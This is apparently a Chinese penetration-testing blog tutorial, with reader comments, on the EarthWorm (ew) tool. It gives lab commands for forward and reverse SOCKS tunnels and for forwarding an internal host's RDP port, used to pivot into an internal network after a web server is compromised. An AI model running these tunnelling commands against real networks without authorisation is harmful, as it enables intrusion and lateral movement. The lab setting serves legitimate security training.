ew–流量映射+端口转发

枫少@KillBoy
枫少@KillBoy
管理员
219
文章
0
粉丝
资源分享358,4541字数 1144阅读3分48秒阅读模式
AI智能摘要
如何让内网渗透如“开挂”般丝滑?本文深度揭秘红队利器EW的流量映射与端口转发实战技巧。从反向代理到正向穿透,手把手教你利用EW搭建隐蔽隧道,实现内网漫游。涵盖rcsocks、rssocks、lcx系列核心命令的详细用法,配合真实环境演示,清晰解析不同场景下的参数组合逻辑。无论你是拿下Web服务器后如何反向连接,还是仅凭跳板机实现端口转发,这里都有完整解决方案。看完即用,渗透效率瞬间拉满。
— AI 生成的文章内容摘要

原理

1、ew反向代理(内网机器无公网ip需要反弹到公网,需要在vps监听)

vps服务端执行:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024

内网机器执行:

ew_for_Win.exe -s rssocks -d vps的ip -e 1024

使用方式:sock5代理访问的1080端口

2、正向代理(跳ban机既有内网ip又有公网ip,直接建立正向代理进入内网,无需vps)

内网机器执行:

ew_for_Win.exe -s ssocksd -l 1080

使用方式:sock5代理访问内网机器的外网ip的1080端口

思维导图

ew–流量映射+端口转发-图片1

参数详解

VERSION : free1.2 (版本号1.2)

./xxx ([-options] [values])*

options :

Eg: ./xxx -s ssocksd -h

-s state setup the function.You can pick one from the ##指定使用的代理方式

following options:

ssocksd :##正向代理

rcsocks ##反向代理

rssocks ##

lcx_listen ##监听

lcx_tran ##反向连接 一步就成

lcx_slave ##正向连接(配合listen使用)

-l listenport open a port for the service startup. ## 监听得端口

-d refhost set the reflection host address. ## 设置反射主机地址

-e refport set the reflection port. ## 设置反射端口

-f connhost set the connect host address . ## 设置连接主机地址

-g connport set the connect port. ## 设置连接端口

-h help show the help text, By adding the -s parameter, ## 帮助

you can also see the more detailed help. ##

-a about show the about pages ## 关于显示关于页面

-v version show the version. ## 版本

-t usectime set the milliseconds for timeout. The default ##设置超时的毫秒数

value is 1000 ##

一、流量映射

1.环境准备

一台kali 客户端,可以联通内网,也可以连通外网

外网ip 192.168.0.103

内网ip 192.168.52.2

一台win server03 内网web服务器

内网ip 192.168.52.3

一台win10外网客户机

同样的需要将ew这款工具进行拉入到靶机里面

如下图:

ew–流量映射+端口转发-图片2

1615380421_6048bfc5318d5aa8c1d5d.png!small?1615380419983

2.流量映射

A、正向代理

kali中直接去连接

./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理

攻击机通过访问 目标主机8888 端口使用目标主机提供的代理

./ew -s ssocksd -l 8888

ew–流量映射+端口转发-图片3

在火狐中设置代理

ew–流量映射+端口转发-图片4

然后再访问百度

发现反射回去了

ew–流量映射+端口转发-图片5

访问内网发现成功

ew–流量映射+端口转发-图片6

1615380470_6048bff60f8c257d50139.png!small?1615380468819

B、反向代理

第一种情况:拿下了web服务器,和内网服务器

这次要准备kali作为web服务器,连接外网的

win server 03作为内网服务器

1.在公网服务器(kali)上执行以下命令进行监听:

./ew -s rcsocks -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机

./ew -s rcsocks -l 7777 -e 1024 

ew–流量映射+端口转发-图片7

2.在win server 03中进行流量映射

./ew_for_Win.exe -s rssocks -d 97.xx.xx.23 -e 1024 通过socks隧道连接公网IP的1024端口

ew -s rssocks -d 192.168.52.2 -e 1024

ew–流量映射+端口转发-图片8

3.设置火狐代理

代理类型一定要是SOCKS5

ew–流量映射+端口转发-图片9

访问一下百度,发现是这样

ew–流量映射+端口转发-图片10

然后我们在进行访问一下win server 03内网服务器

ew–流量映射+端口转发-图片11

发现同样能成功

看一下隧道的变化

ew–流量映射+端口转发-图片12

1615380531_6048c0330394f72d88f6c.png!small?1615380529750

至此我们就可以漫游内网了

第二种情况:

只拿下了一台web服务器

直接手画草图,哈哈,够敬业吧

ew–流量映射+端口转发-图片13

实验环境

kali :web服务器:

192.168.0.105

192.168.52.6

win server 03 :内网服务器

192.168.52.11

win 10 模拟公网vps主机1:

192.168.0.104

win 7 模拟攻击机2设置代理访问内网

192.168.0.102

1.首先在win10(vps)上进行监听

ew -s rcsocks -l 7777 -e 1024

ew–流量映射+端口转发-图片14

2.再在kali上设置反向代理

./ew -s rssocks -d vps公网ip -e 1024

./ew -s rssocks -d 192.168.0.104 -e 1024

ew–流量映射+端口转发-图片15

3.从win7中进行设置代理

ew–流量映射+端口转发-图片16

1615380621_6048c08d4a5878a1b64e5.png!small?1615380620056

发现可以直接漫游内网

4.咱们访问的时候观察一下反向代理的变化

ew–流量映射+端口转发-图片17

发现成功到达内网的80

至此我们就可以漫游内网了

二、端口转发

思维导图在上个lck的差不多,所以我就在网上随便扒下来一张,博主觉得侵权的话,来找我,我给你一个oday,啊哈哈哈~~~

ew–流量映射+端口转发-图片18

A、反向代理

./ew -s lcx_tran -l kali上监听端口 -f 指定得内网地址 -g 内网某服务端口

./ew -s lcx_tran -l 4444 -f 192.168.52.3 -g 3389

可以一步到位,直接连接

ew–流量映射+端口转发-图片19

B、正向代理

a、创建监听

./ew -s lcx_listen -l 监听的公网端口 -e web服务器得内网端口

./ew -s lcx_listen -l 9083 -e 9091

ew–流量映射+端口转发-图片20

b、在win server 中进行转发

ew -s lcx_slave -d web服务器得内网地址 -e web服务器得内网端口 -f 内网地址 -g 内网得服务端口

ew -s lcx_slave -d 192.168.52.2 -e 9091 -f 192.168.52.3 -g 3389

纠正:(以后实战的时候进行纠正)

应该是在web服务器上面执行的:

ew -s lcx_slave -d web服务器得内网地址 -e web服务器得内网端口 -f 内网地址 -g 内网得服务端口

ew–流量映射+端口转发-图片21

验证

ew–流量映射+端口转发-图片22

验证成功

https://www.freebuf.com/sectool/265769.html

 
枫少@KillBoy
评论  35  访客  33  作者  2
    • 狐小萌
      狐小萌 1

      反向代理配置试了几次才成功,端口转发还是容易出问题

        • 迷糊的小浣熊
          迷糊的小浣熊 0

          @ 狐小萌 我配置的时候老提示连接被拒绝,是权限问题吗?

        • 血月织影
          血月织影 1

          这种工具在实战中确实好用,之前搞内网穿透就用的它

          • 俏皮鸭
            俏皮鸭 0

            -e参数是设置反射端口吧?1024这个值能改吗

            • 风里来
              风里来 1

              反向代理那步老连不上,防火墙要关吗🤔

                • 蚁人斯科特
                  蚁人斯科特 1

                  @ 风里来 防火墙不用关,开放对应端口就行

                • 砚台凝香
                  砚台凝香 0

                  正反向代理的区别讲得挺清楚,比之前看的教程明白

                  • 幻羽流光
                    幻羽流光 0

                    用ew做流量映射比frp简单,就是命令行容易敲错

                    • 樱花鹿
                      樱花鹿 0

                      内网机器没公网IP的情况比较常见,反向代理方案实用

                      • 薄荷糖
                        薄荷糖 1

                        试了下正向代理,速度还行就是配置有点麻烦

                        • 光年漫游
                          光年漫游 0

                          端口转发部分没太看懂,能再具体说说lcx_slave的用法吗

                            • 蜜糖喵喵
                              蜜糖喵喵 0

                              @ 光年漫游 lcx_slave就是把一个端口的流量转到另一个端口,文章里那个命令顺序调一下可能更清楚。

                            • Gilded Echo
                              Gilded Echo 1

                              这种技术文章现在不多见了,虽然有点老但思路还是对的

                                • 云端园丁
                                  云端园丁 1

                                  @ Gilded Echo 这种老教程还能用,说明东西确实扎实。

                                • 霍山黄芽
                                  霍山黄芽 0

                                  反向代理配置那里防火墙规则要特别注意,不然死活连不上。

                                  • 小霸王玩家
                                    小霸王玩家 1

                                    1024端口能改,别用太常见的就行,容易被扫。

                                    • 噗嗤
                                      噗嗤 0

                                      老工具了,现在新出的工具配置更简单点。

                                      • 影子
                                        影子 0

                                        之前用这个搞过内网办公,确实能通,就是延迟有点高。

                                        • 软糖小雨
                                          软糖小雨 1

                                          原理是懂了,但实际搭环境还是得折腾一会儿。

                                          • 懒羊羊本羊
                                            懒羊羊本羊 0

                                            正向代理速度咋样,有人测过吗?

                                            • 沁芳桥上
                                              沁芳桥上 0

                                              端口转发那块图要是有就好了,光看命令有点抽象。

                                              • 迷路的程序员
                                                迷路的程序员 1

                                                这个配置在M1芯片的Mac上能用吗?

                                                • 茶童杨
                                                  茶童杨 0

                                                  1024端口可以换成其他端口吗?感觉默认的容易被扫

                                                  • 老式闹钟
                                                    老式闹钟 0

                                                    试了下反向代理,确实能通内网,就是延迟有点高

                                                    • 火锅底料怪
                                                      火锅底料怪 0

                                                      之前在内网搞运维用过类似方案,不过现在都用frp了

                                                      • 海澜
                                                        海澜 0

                                                        端口转发那块没太看明白,能详细说说lcx_slave吗?

                                                        • 幻羽
                                                          幻羽 1

                                                          参数挺多的,得慢慢看。

                                                          • Sapphire Skies
                                                            Sapphire Skies 1

                                                            @豆包 这玩意儿能用来打游戏加速不?

                                                              • doubao
                                                                doubao 5

                                                                @ Sapphire Skies 这工具是网络代理用的,打游戏加速可能不太行,延迟和稳定性估计跟不上。

                                                              • 小狗跳跳
                                                                小狗跳跳 1

                                                                这个图画的有点抽象啊哈哈

                                                                  • 枫少@KillBoy
                                                                    枫少@KillBoy

                                                                    @ 小狗跳跳 哈哈,画图水平有限,能看懂就行~

                                                                  • 智慧立方
                                                                    智慧立方 1

                                                                    参数看着头大,先收藏了慢慢看。

                                                                      • 幽灵阁
                                                                        幽灵阁 1

                                                                        @ 智慧立方 参数是挺多的,慢慢消化

                                                                      • 香菜收割机
                                                                        香菜收割机 1

                                                                        反向代理那步操作起来卡了好久。

                                                                          • 枫少@KillBoy
                                                                            枫少@KillBoy

                                                                            @ 香菜收割机 反向代理参数配置上容易出问题,多试试就行。

                                                                        匿名

                                                                        发表评论

                                                                        匿名网友

                                                                        拖动滑块以完成验证